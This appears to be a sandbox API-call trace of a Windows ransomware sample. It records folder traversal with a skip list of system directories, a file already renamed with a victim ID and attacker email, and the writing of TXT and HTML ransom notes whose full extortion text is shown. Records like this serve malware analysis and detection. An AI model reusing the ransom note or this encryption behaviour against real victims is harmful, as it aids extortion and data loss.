	[0176.102] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0176.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.103] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0176.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.103] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0176.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.103] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0176.103] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.103] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.103] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x827dc55d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="..", cAlternateFileName="")) returned 1
	[0176.118] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827dc55d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x827dc55d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x827dc55d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827b6354, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x827b6354, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x827dc55d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e574f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e574f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x19aa, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x586, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ec9c48, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9ec9c48, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9ec9c48, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1018, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f16127, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f16127, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f16127, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_3.provxml", cAlternateFileName="POWER_~4.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f62605, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f62605, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f62605, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_4.provxml", cAlternateFileName="PO21B6~1.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f88875, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f88875, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f88875, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_5.provxml", cAlternateFileName="PO5EBD~1.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x757, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_6.provxml", cAlternateFileName="PO805B~1.PRO")) returned 1
	[0176.119] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 1
	[0176.121] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 0
	[0176.121] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
	[0176.121] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 0
	[0176.121] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x826d1556, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x826d1556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x826f7759, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0176.122] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x826d1556, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x826d1556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x826f7759, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0176.122] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.122] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0176.122] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0176.122] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0176.123] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0176.123] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 0
	[0176.123] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.123] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.124] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1
	[0176.124] lstrcmpW (lpString1="Search", lpString2="..") returned 1
	[0176.124] lstrcmpW (lpString1="Search", lpString2=".") returned 1
	[0176.124] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0176.124] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0176.124] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Search" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search"
	[0176.124] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search"
	[0176.125] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\"
	[0176.125] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\"
	[0176.125] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\*.*"
	[0176.125] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0176.127] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned 39
	[0176.127] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.127] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\search\\*.*") returned 0x27
	[0176.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.127] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="windows") returned 0x0
	[0176.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="boot") returned 0x0
	[0176.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="system volume information") returned 0x0
	[0176.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="temp") returned 0x0
	[0176.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="program files") returned 0x0
	[0176.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="appdata") returned 0x0
	[0176.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="application data") returned 0x0
	[0176.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="winnt") returned 0x0
	[0176.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="tmp") returned 0x0
	[0176.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="cache") returned 0x0
	[0176.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="webcache") returned 0x0
	[0176.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="inetcache") returned 0x0
	[0176.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="nvidia") returned 0x0
	[0176.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="packages") returned 0x0
	[0176.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="cookies") returned 0x0
	[0176.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="programdata") returned 0x0
	[0176.132] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.133] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1
	[0176.133] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 0
	[0176.133] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.133] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.133] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search"
	[0176.133] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\*.*"
	[0176.134] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.134] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.134] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
	[0176.134] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0176.135] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.135] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.139] CloseHandle (hObject=0x384) returned 1
	[0176.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.139] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.140] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0176.140] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.141] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0176.141] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.141] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.141] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0176.141] CloseHandle (hObject=0x384) returned 1
	[0176.142] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.142] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.142] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.142] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0176.142] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0176.144] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.144] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0176.148] CloseHandle (hObject=0x384) returned 1
